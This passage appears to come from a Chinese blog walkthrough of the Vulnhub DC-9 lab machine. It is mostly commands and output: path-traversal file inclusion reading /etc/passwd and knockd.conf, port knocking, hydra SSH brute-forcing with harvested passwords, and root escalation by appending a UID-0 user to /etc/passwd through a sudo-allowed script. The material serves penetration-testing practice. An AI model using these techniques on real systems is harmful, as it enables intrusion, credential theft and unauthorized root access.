[01:09:25] [INFO] table 'Staff.Users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.190/dump/Staff/Users.csv'
[01:09:25] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.190'
[01:09:25] [WARNING] your sqlmap version is outdated
[*] ending @ 01:09:25 /2023-02-14/
用在线网站解密得到admin密码:transorbital1
但是ssh目前端口是filtered
前面文件包含漏洞方向应该是正确的,应该需要加上Cookie
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ wfuzz -c -u http://192.168.56.190/manage.php?FUZZ=../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H "Cookie:PHPSESSID=pn3khsirub7ln7vqqbpn1oobu2" --hw 100
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.190/manage.php?FUZZ=../../../../../etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000759: 200 93 L 172 W 3694 Ch "file"
http://192.168.56.190/manage.php?file=../../../../../../../etc/passwd
oot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash
看有无远程文件包含,经过测试不存在
因为目前最大的问题是22端口是Filtered,应该存在端口knock
通常情况下,knockd服务的默认配置文件都是/etc/knockd.conf,利用文件包含漏洞读取该文件
访问:
http://192.168.56.190/manage.php?file=../../../../etc/knockd.conf
File does not exist
[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
说明对端口7469,8475,9842 knock以后,ssh端口就会开启
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ nmap -p 7469 192.168.56.190
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 01:35 EST
Nmap scan report for localhost (192.168.56.190)
Host is up (0.00068s latency).
PORT STATE SERVICE
7469/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ nmap -p 8475 192.168.56.190
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 01:35 EST
Nmap scan report for bogon (192.168.56.190)
Host is up (0.00056s latency).
PORT STATE SERVICE
8475/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ nmap -p 9842 192.168.56.190
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 01:36 EST
Nmap scan report for localhost (192.168.56.190)
Host is up (0.00051s latency).
PORT STATE SERVICE
9842/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ nmap 192.168.56.190
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 01:36 EST
Nmap scan report for bogon (192.168.56.190)
Host is up (0.00080s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
将前面得到的用户名和密码分别形成字典
──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ hydra -L user -P pass ssh://192.168.56.190
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-14 02:15:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.56.190:22/
[22][ssh] host: 192.168.56.190 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.56.190 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.56.190 login: janitor password: Ilovepeepee
[STATUS] 284.00 tries/min, 284 tries in 00:01h, 8 to do in 00:01h, 13 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-14 02:17:01
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ ssh [email protected]
The authenticity of host '192.168.56.190 (192.168.56.190)' can't be established.
ED25519 key fingerprint is SHA256:QqKiAU3zrowiN9K1SVvmSWvLBZAqdSpT0aMLTwGlyvo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.190' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ id
uid=1016(janitor) gid=1016(janitor) groups=1016(janitor)
janitor@dc-9:~$ ls -alh
total 16K
drwx------ 4 janitor janitor 4.0K Feb 14 17:16 .
drwxr-xr-x 19 root root 4.0K Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4.0K Feb 14 17:16 .gnupg
drwx------ 2 janitor janitor 4.0K Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls -alh
total 12K
drwx------ 2 janitor janitor 4.0K Dec 29 2019 .
drwx------ 4 janitor janitor 4.0K Feb 14 17:16 ..
-rwx------ 1 janitor janitor 66 Dec 29 2019 passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
将这里的密码加入到前面的cewl得到的字典,形成密码字典
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ cp user pass.dict
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ vim pass.dict
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ hydra -L user -P pass.dict ssh://192.168.56.190
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-14 19:48:41
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://192.168.56.190:22/
[22][ssh] host: 192.168.56.190 login: fredf password: B4-Tru3-001
又破解得到了fredf的密码。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/DC9]
└─$ ssh [email protected]
[email protected]'s password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:~$ cat /opt/devstuff/dist/test/test
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
提权
fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test
Usage: python test.py read append
fredf@dc-9:~$ cd /opt/devstuff
fredf@dc-9:/opt/devstuff$ ls -alh
total 28K
drwxr-xr-x 5 root root 4.0K Dec 29 2019 .
drwxr-xr-x 4 root root 4.0K Dec 29 2019 ..
drwxr-xr-x 3 root root 4.0K Dec 29 2019 build
drwxr-xr-x 3 root root 4.0K Dec 29 2019 dist
drwxr-xr-x 2 root root 4.0K Dec 29 2019 __pycache__
-rw-r--r-- 1 root root 250 Dec 29 2019 test.py
-rw-r--r-- 1 root root 959 Dec 29 2019 test.spec
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python
import sys
if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1)
else :
f = open(sys.argv[1], "r")
output = (f.read())
f = open(sys.argv[2], "a")
f.write(output)
f.close()
fredf@dc-9:/opt/devstuff$
可以另外创建一个用户(该用户UID为0),然后利用test命令追加到/etc/passwd文件中去。
fredf@dc-9:/tmp$ echo 'jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash' > newuser
fredf@dc-9:/tmp$ cat newuser
jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash
redf@dc-9:/tmp$ chmod 777 newuser
fredf@dc-9:/tmp$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:/tmp$ sudo /opt/devstuff/dist/test/test newuser /etc/passwd
fredf@dc-9:/tmp$ su - jason
Password:
root@dc-9:~# cd /root
root@dc-9:~# ls -alh
total 32K
drwx------ 5 root root 4.0K Dec 29 2019 .
drwxr-xr-x 18 root root 4.0K Dec 29 2019 ..
lrwxrwxrwx 1 root root 9 Dec 29 2019 .bash_history -> /dev/null
-rwx------ 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Dec 29 2019 .cache
drwx------ 3 root root 4.0K Dec 29 2019 .gnupg
drwx------ 3 root root 4.0K Dec 29 2019 .local
-rwx------ 1 root root 148 Aug 18 2015 .profile
-rwx------ 1 root root 1.8K Dec 29 2019 theflag.txt
root@dc-9:~# cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, but...just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish.
root@dc-9:~#
注意:
1.根据test.py脚本,增加的新用户信息需要存到文件中,然后test命令可以读取该文件
2.需要修改权限,让test有权限读取文件内容
标签:INFO,01,based,05,kali,DC,192.168,Vulnhub,靶机 From: https://www.cnblogs.com/jason-huawen/p/17121500.html